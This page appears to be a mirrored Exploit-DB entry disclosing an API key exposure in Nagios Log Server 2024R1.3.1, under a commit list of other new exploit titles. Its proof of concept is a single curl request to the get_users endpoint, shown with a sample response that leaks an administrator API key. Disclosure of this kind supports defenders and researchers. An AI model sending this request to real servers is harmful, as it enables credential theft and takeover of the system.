bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52177.md
Exploit-DB b165516b1b DB: 2025-04-12 
26 changes to exploits/shellcodes/ghdb

ABB Cylon Aspect 3.08.02 - PHP Session Fixation
ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery
ABB Cylon FLXeon 9.3.4 - Default Credentials
ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)
ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure
ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning

Netman 204 - Remote command without authentication

qBittorrent 5.0.1 - MITM RCE

CMU CERT/CC VINCE 2.0.6 - Stored XSS

CyberPanel 2.3.6 - Remote Code Execution (RCE)
GeoVision GV-ASManager 6.1.0.0 - Broken Access Control
GeoVision GV-ASManager 6.1.1.0 - CSRF

MagnusSolution magnusbilling 7.3.0 - Command Injection

Nagios Log Server 2024R1.3.1 - API Key Exposure

WebFileSys 2.31.0 - Directory Path Traversal

flatCore 1.5 - Cross Site Request Forgery (CSRF)

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

MiniCMS 1.1 - Cross Site Scripting (XSS)

NEWS-BUZZ News Management System 1.0 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
2025-04-12 00:16:31 +00:00

1.4 KiB
Raw Blame History

Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure

Date: 2025-04-08

Exploit Author: Seth Kraft, Alex Tisdale

Vendor Homepage: https://www.nagios.com/

Vendor Changelog: https://www.nagios.com/changelog/#log-server

Software Link: https://www.nagios.com/products/log-server/download/

Version: Nagios Log Server 2024R1.3.1 and below

Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)

CWE: CWE-200, CWE-284, CWE-522

CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Type: Information Disclosure, Improper Access Control

Exploit Risk: Critical

Disclosure

For ethical research purposes only. Do not target systems without proper authorization.

Description

An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.

PoC

Step 1: Access the vulnerable endpoint

curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

Sample Response

[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "test@example.com",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]